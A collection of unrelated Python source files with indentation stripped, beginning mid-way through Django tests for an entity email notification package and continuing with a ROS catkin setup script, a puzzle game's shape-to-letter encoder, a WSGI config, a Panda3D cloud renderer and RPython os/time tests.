# Both entities are subscribed with a group subscription and are following the super entity of the event
self.assertEquals(set(email.recipients.all()), set([e, other_e]))
self.assertEquals(email.event.context, email_context)
self.assertEquals(email.subject, '')
self.assertEquals(email.scheduled, datetime(2013, 1, 2))
@freeze_time('2013-1-2')
def test_basic_only_following_false_group_subscription(self):
source = G(Source)
ek = G(EntityKind)
e = G(Entity, entity_kind=ek)
se = G(Entity)
G(EntityRelationship, sub_entity=e, super_entity=se)
other_e = G(Entity, entity_kind=ek)
G(EntityRelationship, sub_entity=other_e, super_entity=se)
G(Subscription, entity=se, sub_entity_kind=ek, source=source, medium=self.email_medium, only_following=False)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
}
event = G(Event, source=source, context=email_context)
G(EventActor, event=event, entity=e)
EntityEmailerInterface.convert_events_to_emails()
email = Email.objects.get()
# Both entities are subscribed with a group subscription and are following the super entity of the event
self.assertEquals(set(email.recipients.all()), set([e, other_e]))
self.assertEquals(email.event.context, email_context)
self.assertEquals(email.subject, '')
self.assertEquals(email.scheduled, datetime(2013, 1, 2))
@freeze_time('2013-1-2')
def test_basic_only_following_false_group_subscription_with_unsubscribed(self):
source = G(Source)
ek = G(EntityKind)
e = G(Entity, entity_kind=ek)
se = G(Entity)
G(EntityRelationship, sub_entity=e, super_entity=se)
other_e = G(Entity, entity_kind=ek)
G(EntityRelationship, sub_entity=other_e, super_entity=se)
G(Subscription, entity=se, sub_entity_kind=ek, source=source, medium=self.email_medium, only_following=False)
G(Unsubscription, entity=e, source=source, medium=self.email_medium)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
}
event = G(Event, source=source, context=email_context)
G(EventActor, event=event, entity=e)
EntityEmailerInterface.convert_events_to_emails()
email = Email.objects.get()
self.assertEquals(set(email.recipients.all()), set([other_e]))
self.assertEquals(email.event.context, email_context)
self.assertEquals(email.subject, '')
self.assertEquals(email.scheduled, datetime(2013, 1, 2))
@freeze_time('2013-1-2')
def test_multiple_events_only_following_false(self):
source = G(Source)
e = G(Entity)
other_e = G(Entity)
G(Subscription, entity=e, source=source, medium=self.email_medium, only_following=False)
G(Subscription, entity=other_e, source=source, medium=self.email_medium, only_following=False)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
}
G(Event, source=source, context=email_context)
G(Event, source=source, context=email_context)
EntityEmailerInterface.convert_events_to_emails()
self.assertEquals(Email.objects.count(), 2)
for email in Email.objects.all():
self.assertEquals(set(email.recipients.all()), set([e, other_e]))
self.assertEquals(email.event.context, email_context)
self.assertEquals(email.subject, '')
self.assertEquals(email.scheduled, datetime(2013, 1, 2))
@freeze_time('2013-1-2')
def test_bulk_multiple_events_only_following_false(self):
"""
        Bulk-creates events and exercises the unique constraint on the duplicated
        subscription, which would cause a bulk-create error if it were not handled.
"""
source = G(Source)
e = G(Entity)
other_e = G(Entity)
G(Subscription, entity=e, source=source, medium=self.email_medium, only_following=False)
G(Subscription, entity=e, source=source, medium=self.email_medium, only_following=False)
G(Subscription, entity=other_e, source=source, medium=self.email_medium, only_following=False)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
}
G(Event, source=source, context=email_context)
G(Event, source=source, context=email_context)
EntityEmailerInterface.bulk_convert_events_to_emails()
self.assertEquals(Email.objects.count(), 2)
for email in Email.objects.all():
self.assertEquals(set(email.recipients.all()), set([e, other_e]))
self.assertEquals(email.event.context, email_context)
self.assertEquals(email.subject, '')
self.assertEquals(email.scheduled, datetime(2013, 1, 2))
@freeze_time('2013-1-2')
def test_multiple_events_only_following_true(self):
source = G(Source)
e = G(Entity)
other_e = G(Entity)
G(Subscription, entity=e, source=source, medium=self.email_medium, only_following=True)
G(Subscription, entity=other_e, source=source, medium=self.email_medium, only_following=True)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
}
G(Event, source=source, context=email_context)
event = G(Event, source=source, context=email_context)
G(EventActor, event=event, entity=e)
EntityEmailerInterface.convert_events_to_emails()
email = Email.objects.get()
self.assertEquals(set(email.recipients.all()), set([e]))
self.assertEquals(email.event.context, email_context)
self.assertEquals(email.subject, '')
self.assertEquals(email.scheduled, datetime(2013, 1, 2))
@freeze_time('2013-1-2')
def test_bulk_multiple_events_only_following_true(self):
"""
        Bulk-creates events and exercises the unique constraint on the duplicated
        subscription, which would cause a bulk-create error if it were not handled.
"""
source = G(Source)
e = G(Entity)
other_e = G(Entity)
G(Subscription, entity=e, source=source, medium=self.email_medium, only_following=True)
G(Subscription, entity=e, source=source, medium=self.email_medium, only_following=True)
G(Subscription, entity=other_e, source=source, medium=self.email_medium, only_following=True)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
}
G(Event, source=source, context=email_context)
event = G(Event, source=source, context=email_context)
G(EventActor, event=event, entity=e)
EntityEmailerInterface.bulk_convert_events_to_emails()
email = Email.objects.get()
self.assertEquals(set(email.recipients.all()), set([e]))
self.assertEquals(email.event.context, email_context)
self.assertEquals(email.subject, '')
self.assertEquals(email.scheduled, datetime(2013, 1, 2))
@freeze_time('2014-01-05')
class SendUnsentScheduledEmailsTest(TestCase):
def setUp(self):
G(Medium, name='email')
@patch('entity_emailer.interface.get_subscribed_email_addresses')
@patch.object(Event, 'render', spec_set=True)
def test_sends_all_scheduled_emails_no_email_addresses(self, render_mock, address_mock):
render_mock.return_value = ['<p>This is a test html email.</p>', 'This is a test text email.']
address_mock.return_value = []
g_email(context={}, scheduled=datetime.min)
g_email(context={}, scheduled=datetime.min)
EntityEmailerInterface.send_unsent_scheduled_emails()
self.assertEqual(len(mail.outbox), 0)
@patch('entity_emailer.interface.get_subscribed_email_addresses')
@patch.object(Event, 'render', spec_set=True)
def test_sends_all_scheduled_emails(self, render_mock, address_mock):
render_mock.return_value = ['<p>This is a test html email.</p>', 'This is a test text email.']
address_mock.return_value = ['test1@example.com', 'test2@example.com']
g_email(context={}, scheduled=datetime.min)
g_email(context={}, scheduled=datetime.min)
with patch(settings.EMAIL_BACKEND) as mock_connection:
EntityEmailerInterface.send_unsent_scheduled_emails()
self.assertEqual(2, mock_connection.return_value.__enter__.return_value.send_message.call_count)
@patch('entity_emailer.interface.pre_send')
@patch('entity_emailer.interface.get_subscribed_email_addresses')
@patch.object(Event, 'render', spec_set=True)
def test_send_signals(self, render_mock, address_mock, mock_pre_send):
"""
Test that we properly fire signals during the send process
"""
# Setup the email
render_mock.return_value = ['<p>This is a test html email.</p>', 'This is a test text email.']
address_mock.return_value = ['test1@example.com', 'test2@example.com']
email = g_email(context={
'test': 'test'
}, scheduled=datetime.min)
with patch(settings.EMAIL_BACKEND) as mock_connection:
EntityEmailerInterface.send_unsent_scheduled_emails()
# Assert that we sent the email
self.assertEqual(1, mock_connection.return_value.__enter__.return_value.send_message.call_count)
# Assert that we called the pre send signal with the proper values
name, args, kwargs = mock_pre_send.send.mock_calls[0]
self.assertEqual(kwargs['sender'], email.event.source.name)
self.assertEqual(kwargs['email'], email)
self.assertEqual(kwargs['event'], email.event)
self.assertEqual(kwargs['context'], {
'test': 'test',
'entity_emailer_id': str(email.view_uid)
})
self.assertIsInstance(kwargs['message'], EmailMultiAlternatives)
@patch('entity_emailer.interface.get_subscribed_email_addresses')
@patch.object(Event, 'render', spec_set=True)
def test_sends_email_with_specified_from_address(self, render_mock, address_mock):
render_mock.return_value = ['<p>This is a test html email.</p>', 'This is a test text email.']
address_mock.return_value = ['test1@example.com', 'test2@example.com']
from_address = 'test@example.com'
g_email(context={}, from_address=from_address, scheduled=datetime.min)
with patch(settings.EMAIL_BACKEND) as mock_connection:
EntityEmailerInterface.send_unsent_scheduled_emails()
args = mock_connection.return_value.__enter__.return_value.send_message.call_args
self.assertEqual(args[0][0].from_email, from_address)
@patch('entity_emailer.interface.get_subscribed_email_addresses')
@patch.object(Event, 'render', spec_set=True)
def test_sends_no_future_emails(self, render_mock, address_mock):
render_mock.return_value = ['<p>This is a test html email.</p>', 'This is a test text email.']
address_mock.return_value = ['test1@example.com', 'test2@example.com']
g_email(context={}, scheduled=datetime(2014, 1, 6))
EntityEmailerInterface.send_unsent_scheduled_emails()
self.assertEqual(len(mail.outbox), 0)
@patch('entity_emailer.interface.get_subscribed_email_addresses')
@patch.object(Event, 'render', spec_set=True)
def test_sends_no_sent_emails(self, render_mock, address_mock):
render_mock.return_value = ['<p>This is a test html email.</p>', 'This is a test text email.']
address_mock.return_value = ['test1@example.com', 'test2@example.com']
g_email(context={}, scheduled=datetime.min, sent=datetime.utcnow())
EntityEmailerInterface.send_unsent_scheduled_emails()
self.assertEqual(len(mail.outbox), 0)
@patch('entity_emailer.interface.get_subscribed_email_addresses')
@patch.object(Event, 'render', spec_set=True)
def test_updates_times(self, render_mock, address_mock):
render_mock.return_value = ['<p>This is a test html email.</p>', 'This is a test text email.']
address_mock.return_value = ['test1@example.com', 'test2@example.com']
g_email(context={}, scheduled=datetime.min)
EntityEmailerInterface.send_unsent_scheduled_emails()
sent_email = Email.objects.filter(sent__isnull=False)
self.assertEqual(sent_email.count(), 1)
@patch('entity_emailer.interface.email_exception')
@patch('entity_emailer.interface.get_subscribed_email_addresses')
@patch.object(Event, 'render', spec_set=True)
def test_exceptions(self, render_mock, address_mock, mock_email_exception):
"""
Test that we properly handle when an exception occurs
"""
# Mock the render method to raise an exception that we should properly catch
render_mock.side_effect = [
Exception('test'),
['<p>This is a test html email.</p>', 'This is a test text email.']
]
address_mock.return_value = ['test1@example.com', 'test2@example.com']
# Create a test emails to send
g_email(context={}, scheduled=datetime.min)
g_email(context={
'test': 'test'
}, scheduled=datetime.min)
# Send the emails
with patch(settings.EMAIL_BACKEND) as mock_connection:
EntityEmailerInterface.send_unsent_scheduled_emails()
# Assert that both emails were marked as sent
self.assertEqual(Email.objects.filter(sent__isnull=False).count(), 2)
# Assert that only one email is actually sent through backend
self.assertEquals(1, mock_connection.call_count)
# Assert that one email raised an exception
exception_email = Email.objects.get(sent__isnull=False, exception__isnull=False)
self.assertIsNotNone(exception_email)
self.assertTrue('Exception: test' in exception_email.exception)
@patch.object(Event, 'render', spec_set=True)
@patch('entity_emailer.interface.get_subscribed_email_addresses')
def test_send_exceptions(self, mock_get_subscribed_addresses, mock_render):
"""
Verifies that when a single email raises an exception from within the backend, the batch is still
updated as sent and the failed email is saved with the exception
"""
# Create test emails to send
g_email(context={}, scheduled=datetime.min)
failed_email = g_email(context={}, scheduled=datetime.min)
mock_get_subscribed_addresses.return_value = ['test1@example.com']
mock_render.return_value = ('foo', 'bar',)
# Verify baseline, namely that both emails are not marked as sent and that neither has an exception saved
self.assertEquals(2, Email.objects.filter(sent__isnull=True).count())
class TestEmailSendMessageException(Exception):
def to_dict(self):
return {'message': str(self)}
with patch(settings.EMAIL_BACKEND) as mock_connection:
# Mock side effects for sending emails
mock_connection.return_value.__enter__.return_value.send_message.side_effect = [
None,
TestEmailSendMessageException('test'),
]
EntityEmailerInterface.send_unsent_scheduled_emails()
# Verify that both emails are marked as sent
self.assertEquals(2, Email.objects.filter(sent__isnull=False).count())
# Verify that the failed email was saved with the exception
actual_failed_email = Email.objects.get(sent__isnull=False, exception__isnull=False)
self.assertEquals(failed_email.id, actual_failed_email.id)
self.assertEquals(
'test: {}'.format(json.dumps({'message': 'test'})),
actual_failed_email.exception
)
class CreateEmailObjectTest(TestCase):
def test_no_html(self):
email = create_email_message(
['to@example.com'], 'from@example.com', 'Subject', 'Email Body.', ''
)
email.send()
self.assertEqual(mail.outbox[0].attachments, [])
def test_html(self):
email = create_email_message(
['to@example.com'], 'from@example.com', 'Subject', 'Email Body.', '<html>A</html>'
)
email.send()
expected_alternatives = [('<html>A</html>', 'text/html')]
self.assertEqual(mail.outbox[0].alternatives, expected_alternatives)
class GetSubscribedEmailAddressesTest(TestCase):
def test_get_emails_default_settings(self):
e1 = G(Entity, entity_meta={'email': 'hello1@hello.com'})
e2 = G(Entity, entity_meta={'email': 'hello2@hello.com'})
e3 = G(Entity, entity_meta={'email': ''})
e4 = G(Entity, entity_meta={})
email = g_email(recipients=[e1, e2, e3, e4], context={})
addresses = get_subscribed_email_addresses(email)
self.assertEqual(set(addresses), set(['hello1@hello.com', 'hello2@hello.com']))
@override_settings(ENTITY_EMAILER_EMAIL_KEY='email_address')
@override_settings(ENTITY_EMAILER_EXCLUDE_KEY='last_invite_time')
def test_get_emails_override_email_key(self):
e1 = G(Entity, entity_meta={'email_address': 'hello1@hello.com', 'last_invite_time': 1000})
e2 = G(Entity, entity_meta={'email_address': 'hello2@hello.com', 'last_invite_time': None})
e3 = G(Entity, entity_meta={'email_address': 'hello3@hello.com', 'last_invite_time': False})
email = g_email(recipients=[e1, e2, e3], context={})
addresses = get_subscribed_email_addresses(email)
self.assertEqual(set(addresses), set(['hello1@hello.com']))
@override_settings(ENTITY_EMAILER_EMAIL_KEY='email_address')
def test_get_emails_override_email_key_exclude_key(self):
e1 = G(Entity, entity_meta={'email_address': 'hello1@hello.com'})
e2 = G(Entity, entity_meta={'email_address': 'hello2@hello.com'})
email = g_email(recipients=[e1, e2], context={})
addresses = get_subscribed_email_addresses(email)
self.assertEqual(set(addresses), set(['hello1@hello.com', 'hello2@hello.com']))
class GetFromEmailAddressTest(TestCase):
def test_default_from_email(self):
# settings.DEFAULT_FROM_EMAIL is already set to test@example.com
from_email = get_from_email_address()
expected = 'test@example.com'
self.assertEqual(from_email, expected)
@override_settings(ENTITY_EMAILER_FROM_EMAIL='test_entity@example.com')
def test_entity_emailer_from_email(self):
from_email = get_from_email_address()
expected = 'test_entity@example.com'
self.assertEqual(from_email, expected)
class GetEmailAddressesTest(TestCase):
def test_returns_own_email(self):
entity_1 = G(Entity, entity_meta={'email': 'test_1@example.com'})
entity_2 = G(Entity, entity_meta={'email': 'test_2@example.com'})
email = g_email(recipients=[entity_1, entity_2], context={})
addresses = get_subscribed_email_addresses(email)
expected_addresses = {u'test_1@example.com', u'test_2@example.com'}
self.assertEqual(set(addresses), expected_addresses)
def test_no_recipients(self):
email = g_email(recipients=[], context={})
addresses = get_subscribed_email_addresses(email)
self.assertEqual(addresses, [])
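# End-to-end sketch of the interface exercised in this suite (scheduling and
# sending are separate steps):
#
#     EntityEmailerInterface.convert_events_to_emails()      # Event -> Email rows
#     EntityEmailerInterface.send_unsent_scheduled_emails()  # Email rows -> backend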
|
"""Tests for `qdyn` package."""
import pytest
from pkg_resources import parse_version
import qdyn
def test_valid_version():
"""Check that the package defines a valid __version__"""
assert parse_version(qdyn.__version__) >= parse_version("0.3.0-dev")
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import os
import stat
import sys
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/melodic/share/catkin/cmake', 'catkinConfig.cmake.in')):
sys.path.insert(0, os.path.join('/opt/ros/melodic/share/catkin/cmake', '..', 'python'))
try:
from catkin.environment_cache import generate_environment_script
except ImportError:
# search for catkin package in all workspaces and prepend to path
for workspace in "/home/caster/ros_ws/caster/devel;/opt/ros/melodic".split(';'):
python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
if os.path.isdir(os.path.join(python_path, 'catkin')):
sys.path.insert(0, python_path)
break
from catkin.environment_cache import generate_environment_script
code = generate_environment_script('/home/caster/ros_ws/caster/devel/.private/caster_teleop/env.sh')
output_filename = '/home/caster/ros_ws/caster/build/caster_teleop/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
#print('Generate script for cached setup "%s"' % output_filename)
f.write('\n'.join(code))
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
|
from math import tau
from random import choice
import pkgutil
import string
from .common import change_sprite_image
ROTS = {
(1, 0): 0,
(0, 1): 1,
(-1, 0): 2,
(0, -1): 3,
}
SYMBOLS = {}
text = pkgutil.get_data('mufl', 'text/symbols.txt').decode('utf-8')
for line in text.splitlines():
sym, codes = line.rsplit(maxsplit=1)
for i in range(0, len(codes), 4):
key = codes[i:i+4]
SYMBOLS[key] = sym
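# symbols.txt is assumed to hold one symbol per line: a display name followed
# by one or more concatenated 4-character column codes in the format that
# encode_letter() below produces.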
def encode_letter(letter):
enc = []
for x in range(4):
num = 0
for y in range(5):
num <<= 1
if (x, y) in letter:
num += 1
enc.append(chr(48+num))
return ''.join(enc)
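# Worked example: a shape filling only column x=0 (rows y=0..4) packs that
# column to 0b11111 == 31, i.e. chr(48 + 31) == 'O', and the empty columns
# to chr(48) == '0', giving the code 'O000'.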
class ThingTile:
def __init__(self):
self.filled = False
self.corners = [False] * 4
def get_sprite_info(self):
fc = '01'[self.filled]
num_corners = sum(self.corners)
if num_corners == 0:
return f'block_{fc}0000', 0
elif num_corners == 1:
return f'block_{fc}1000', tau/4 * self.corners.index(True)
elif num_corners == 2:
if self.corners == [True, False, True, False]:
return f'block_{fc}1010', 0
elif self.corners == [False, True, False, True]:
return f'block_{fc}1010', tau/4
elif self.corners == [True, False, False, True]:
return f'block_{fc}1100', tau*3/4
else:
return f'block_{fc}1100', tau/4 * self.corners.index(True)
elif num_corners == 3:
return f'block_{fc}1110', tau/4 * (self.corners.index(False) + 2)
else:
return f'block_{fc}1111', 0
def update_sprite(self, sprite):
image, rotation = self.get_sprite_info()
change_sprite_image(sprite, image)
sprite.angle = rotation
def set_wormy_corners(self, d, plus=0):
rot = ROTS[d] + plus
self.set_corner(rot)
self.set_corner(rot-1)
def set_corner(self, c):
self.corners[c%4] = True
def encode(self):
num = int(self.filled)
for corner in self.corners:
num <<= 1
num |= corner
return chr(ord('0') + num)
@classmethod
def from_code(cls, code):
self = cls()
num = ord(code) - ord('0')
for i, corner in reversed(list(enumerate(self.corners))):
self.corners[i] = bool(num & 1)
num >>= 1
self.filled = bool(num & 1)
return self
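# Round-trip sketch for the tile encoding: a filled tile with corners
# [True, False, False, False] packs to 0b11000 == 24, i.e. chr(ord('0') + 24)
# == 'H', and ThingTile.from_code('H') restores the same filled/corner flags.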
def encode_thing(thing):
thingset = {pos for pos, tile in thing.items() if tile.filled}
letter = encode_letter(thingset)
tileset = ''.join(thing[x, y].encode() for x in range(4) for y in range(5))
return f'{letter}-{tileset}-{SYMBOLS.get(letter, "")}'
def classify_thing(thing):
shape = frozenset(pos for (pos, tile) in thing.items() if tile.filled)
return encode_letter(shape)
def get_thing_sprite_info(thing_string):
code, tileinfo, comment = thing_string.split('-')
for i, c in enumerate(tileinfo):
if c != '0':
x = i // 5
y = i % 5
yield (x, y, *ThingTile.from_code(c).get_sprite_info())
def get_thing_mesage(encoded):
sym = SYMBOLS.get(encoded)
def cls(*choices):
        return choice(list(set(choices)))
usefuls = (
"It doesn't look useful.",
"Probably not too useful here.",
"Probably not too useful.",
"In other words, trash.",
"It doesn't look useful here.",
"You don't know what to do with that.",
"You don't see how it can be useful here.",
)
if sym is None:
ci = cls('a curious', 'an interesting', 'a weird')
useful = cls(*usefuls)
useful_waste = cls(
*usefuls,
"A waste of metal.",
"A waste of material.",
"Frankly, this is a waste of metal.",
)
return cls(
f"That doesn't remind you of anything.\n{useful_waste}",
f"It's… um… modern art?\n{useful_waste}",
f"Doesn't look familiar.\n{useful_waste}",
f"That's {ci} piece of metal.\n{useful}",
f"That's {ci} hunk of metal.\n{useful}",
)
if sym == 'box':
return cls(
f"A roughly rectangular piece of metal.",
) + "\n" + cls(*usefuls)
elif sym == '.':
return cls(
f"A tiny bit of metal.",
) + "\n" + cls(*usefuls)
elif len(sym) == 1:
if sym in string.ascii_uppercase:
letrune = choice(('letter', 'rune'))
message = cls(
f"That is the {letrune} {sym}!",
f"That's the {letrune} {sym}!",
f"It is the {letrune} {sym}!",
f"It's the {letrune} {sym}!",
f"A perfect {letrune} {sym}!",
f"A perfect {sym}!",
f"You made the {letrune} {sym}!",
f"You made a {sym}!",
f"The {letrune} {sym}!",
)
if sym in 'HELP':
message += "\n" + cls(
f"That should get some attention!",
f"Display it!",
f"It will be helpful!",
)
else:
message += "\n" + cls(
*usefuls,
"That's not too interesting.",
"It doesn't look useful.",
)
return message
if sym in string.ascii_lowercase:
sym = sym.upper()
letrune = choice(('letter', 'rune'))
message = cls(
f"That resembles the {letrune} {sym}.",
f"Looks a bit like the {letrune} {sym}.",
f"Someone could read it as the {letrune} {sym}...",
f"It's a bit like the {letrune} {sym}!",
f"It's similar to a {sym}!",
)
if sym in 'HELP':
message += "\n" + cls(
f"That could get some attention.",
f"Try to display it.",
f"It might be helpful!",
)
else:
message += "\n" + cls(
*usefuls,
f"Frankly, a waste of metal.",
)
return message
else:
message = cls(
f"That resembles the symbol {sym}...",
f"It's… the symbol “{sym}”!",
f"Someone could read it as “{sym}”",
f"It's a bit like a “{sym}”.",
f"It's similar to a “{sym}”.",
)
message += "\n" + cls(
*usefuls,
"Frankly, a waste of metal.",
)
return message
elif sym == 'hook':
return cls(
f"A hook!\nMight make the fishing easier.",
f"It's a fish hook!",
f"A hook!\nYou'll use it next time you fish.",
f"A metal fish hook!\nProbably not more effective than your regular ones.",
)
else:
return cls(
f"It's a {sym}.",
f"A {sym}!",
f"It resembles a {sym}.",
f"You made a metal {sym}!",
f"Looks like a {sym}.",
) + "\n" + cls(*usefuls)
|
"""
WSGI config for agender_ui project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'agender_ui.settings')
application = get_wsgi_application()
|
# -*- coding: utf-8 -*-
# Copyright Aaron Snoswell
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math, posixpath, random
#from pandac.PandaModules import Point2, Vec3, Vec4, NodePath, CardMaker, Shader, ColorBlendAttrib, Texture
from pandac.PandaModules import *
from direct.task.Task import Task
from direct.interval.IntervalGlobal import *
class CloudObj():
"""An object to represent a single cloud cluster"""
def __init__(self, filename, splat_texture, position, softness=0.5, visibility=0.5):
# Each cloud has a .egg file and a splat texture associated with it
self.model = loader.loadModel(filename)
self.splat_texture = splat_texture
# Attach this cloud's node and create the list of sprites
self.cloud_node = base.cam.attachNewNode("cloud"+str(random.random()))
self.cloud_node.setCompass()
self.sprites = []
        # The cloud has a value that represents how formed or dissolved it is
self.visibility = visibility
# This is used for the fading in and out
self.longest_dist = 0
# Set the cloud's position
self.cloud_node.setPos(base.cam, position)
# Note - stratus type clouds use higher softness values
# Cumulus clouds use lower softness values
self.softness = softness
def set_visibility(self, vis):
"""Sets the visibility of the cloud,
the futher away from the center each sprite is, the less visibile"""
self.visibility = vis
for sprite in self.sprites:
sprite[1].setAlphaScale((1.0-sprite[0])*vis)
def _getmiddle(self, points):
"""Returns the center of a sequence of 3-space points"""
num, x, y, z = 0, 0, 0, 0
for point in points:
x += point.getX()
y += point.getY()
z += point.getZ()
num += 1
return Point3(x*1.0/num,y*1.0/num,z*1.0/num)
def generate_sprites(self):
"""Replaces each object in the model with a sprite"""
cm = CardMaker("spritemaker")
# Create each sprite
for cloudobj in self.model.getChild(0).getChildren():
tight_bounds = cloudobj.getTightBounds()
sprite_midpoint = self._getmiddle(tight_bounds)
            # Set the size of the billboard, roughly based on the size of the box
cm.setFrame(tight_bounds[0].getX(), tight_bounds[1].getY(),
tight_bounds[0].getZ(), tight_bounds[1].getZ())
            # Choose a texture splat tile based on the softness value, jittered
            # with a gaussian; the 4x4 splat atlas holds 16 tiles of width 0.0625.
            tmpsoftness = random.gauss(self.softness, 0.1)
            num = min(15, max(0, int(math.ceil(tmpsoftness / 0.0625)) - 1))
row,column = divmod(num, 4)
cm.setUvRange((row*0.25, column*0.25), ((row+1)*0.25, ((column+1)*0.25)))
# Create the sprite
sprite = self.cloud_node.attachNewNode(cm.generate())
sprite.setPos(self.cloud_node, sprite_midpoint)
sprite.setTexture(self.splat_texture)
sprite.setBillboardPointEye()
#sprite.setBillboardAxis()
sprite.setTwoSided(True)
#sprite.setBin('background', 20)
sprite.setTransparency(TransparencyAttrib.MDual)
sprite.setLightOff()
# Calc the distance from the center of the cloud to this sprite
distance = Vec3(sprite.getPos(self.cloud_node)).length()
if self.longest_dist < distance: self.longest_dist = distance
self.sprites.append([distance, sprite])
# Remove the model from the scene, the sprites are all we want now
self.model.removeNode()
# Re-sort the sprites from closest to the core->furthest from the core
# While we're at it, we pre-calc the normalised distances
self.sprites = sorted(self.sprites)
for sprite in self.sprites:
sprite[0] = sprite[0] / self.longest_dist
# Set the visibility of the cloud
self.set_visibility(self.visibility)
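# Example usage (a minimal sketch, not from the original code; it assumes a
# running Panda3D ShowBase so the globals `base` and `loader` exist, and the
# asset paths below are hypothetical):
#   splat = loader.loadTexture('clouds/splat.png')
#   cloud = CloudObj('clouds/cumulus01.egg', splat, Point3(0, 500, 80), softness=0.3)
#   cloud.generate_sprites()
#   cloud.set_visibility(0.8)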
class Clouds:
"""This creates a cloud system based on artist input."""
def __init__(self,manager,xml):
# Get the path to load clouds from...
basePath = manager.get('paths').getConfig().find('clouds').get('path')
self.cloudlist = []
xmlcloudlist = [x for x in xml.findall('cloud')]
cloudsplattexture = loader.loadTexture(posixpath.join(basePath, xml.find('splat').get('fname')))
# XXX See if the user is requesting a cloudbox or a position
# Needs to be handled much better than this
self.cloudbox = None
self.cloudpos = None
xmlcloudbox = xml.find('range')
xmlcloudpos = xml.find('pos')
        if xmlcloudbox is not None:
self.cloudbox = (Point3(int(xmlcloudbox.get('x1')),
int(xmlcloudbox.get('y1')),
int(xmlcloudbox.get('z1'))),
Point3(int(xmlcloudbox.get('x2')),
int(xmlcloudbox.get('y2')),
int(xmlcloudbox.get('z2'))))
        if xmlcloudpos is not None:
self.cloudpos = Point3(int(xmlcloudpos.get('x')),
int(xmlcloudpos.get('y')),
int(xmlcloudpos.get('z')))
# Iterate over each of the requested clouds
        for xmlcloud in xmlcloudlist:
            # Read the values from the xml file
            filename = str(xmlcloud.get('filename'))
            softness = float(xmlcloud.get('softness'))
# Set the cloud in the list
if self.cloudbox:
# Chose a random position for the cloud
pos = Point3(random.randint(self.cloudbox[0].getX(), self.cloudbox[1].getX()),
random.randint(self.cloudbox[0].getY(), self.cloudbox[1].getY()),
random.randint(self.cloudbox[0].getZ(), self.cloudbox[1].getZ()))
cloud = CloudObj(posixpath.join(basePath, filename), cloudsplattexture, pos, softness)
cloud.generate_sprites()
self.cloudlist.append(cloud)
else:
# Default the cloud to (0,0,0)
cloud = CloudObj(posixpath.join(basePath, filename), cloudsplattexture, self.cloudpos, softness)
cloud.generate_sprites()
self.cloudlist.append(cloud)
# Create a testing lerp of the cloud's vis
cloudfadeout = LerpFunc(cloud.set_visibility, 10, 1, 0, 'easeInOut')
cloudfadein = LerpFunc(cloud.set_visibility, 10, 0, 1, 'easeInOut')
cloudsequence = Sequence(cloudfadeout,cloudfadein)
cloudsequence.loop()
|
import py
import os, time, sys
from rpython.tool.udir import udir
from rpython.rlib.rarithmetic import r_longlong
from rpython.annotator import model as annmodel
from rpython.translator.c.test.test_genc import compile
from rpython.translator.c.test.test_standalone import StandaloneTests
posix = __import__(os.name)
def test_time_clock():
def does_stuff():
t1 = t2 = time.clock()
while abs(t2 - t1) < 0.01:
t2 = time.clock()
return t2 - t1
f1 = compile(does_stuff, [])
t = f1()
assert 0 < t < 1.5
def test_time_sleep():
def does_nothing():
time.sleep(0.19)
f1 = compile(does_nothing, [])
t0 = time.time()
f1()
t1 = time.time()
assert t0 <= t1
assert t1 - t0 >= 0.15
def test_os_open():
tmpfile = str(udir.join('test_os_open.txt'))
def does_stuff():
fd = os.open(tmpfile, os.O_WRONLY | os.O_CREAT, 0777)
os.close(fd)
return fd
f1 = compile(does_stuff, [])
fd = f1()
assert os.path.exists(tmpfile)
def test_failing_os_open():
tmpfile = str(udir.join('test_failing_os_open.DOESNTEXIST'))
def does_stuff():
fd = os.open(tmpfile, os.O_RDONLY, 0777)
return fd
f1 = compile(does_stuff, [])
f1(expected_exception_name='OSError')
assert not os.path.exists(tmpfile)
def test_open_read_write_seek_close():
filename = str(udir.join('test_open_read_write_close.txt'))
def does_stuff():
fd = os.open(filename, os.O_WRONLY | os.O_CREAT, 0777)
count = os.write(fd, "hello world\n")
assert count == len("hello world\n")
os.close(fd)
fd = os.open(filename, os.O_RDONLY, 0777)
result = os.lseek(fd, 1, 0)
assert result == 1
data = os.read(fd, 500)
assert data == "ello world\n"
os.close(fd)
f1 = compile(does_stuff, [])
f1()
with open(filename, 'r') as fid:
assert fid.read() == "hello world\n"
os.unlink(filename)
def test_big_read():
filename = str(udir.join('test_open_read_write_close.txt'))
def does_stuff():
fd = os.open(filename, os.O_WRONLY | os.O_CREAT, 0777)
count = os.write(fd, "hello world\n")
os.close(fd)
fd = os.open(filename, os.O_RDONLY, 0777)
data = os.read(fd, 500000)
os.close(fd)
f1 = compile(does_stuff, [])
f1()
os.unlink(filename)
def test_ftruncate():
if not hasattr(os, 'ftruncate'):
py.test.skip("this os has no ftruncate :-(")
filename = str(udir.join('test_open_read_write_close.txt'))
def does_stuff():
fd = os.open(filename, os.O_WRONLY | os.O_CREAT, 0777)
os.write(fd, "hello world\n")
os.close(fd)
fd = os.open(filename, os.O_RDWR, 0777)
os.ftruncate(fd, 5)
data = os.read(fd, 500)
assert data == "hello"
os.close(fd)
does_stuff()
f1 = compile(does_stuff, [])
f1()
os.unlink(filename)
def need_sparse_files():
if sys.platform == 'darwin':
py.test.skip("no sparse files on default Mac OS X file system")
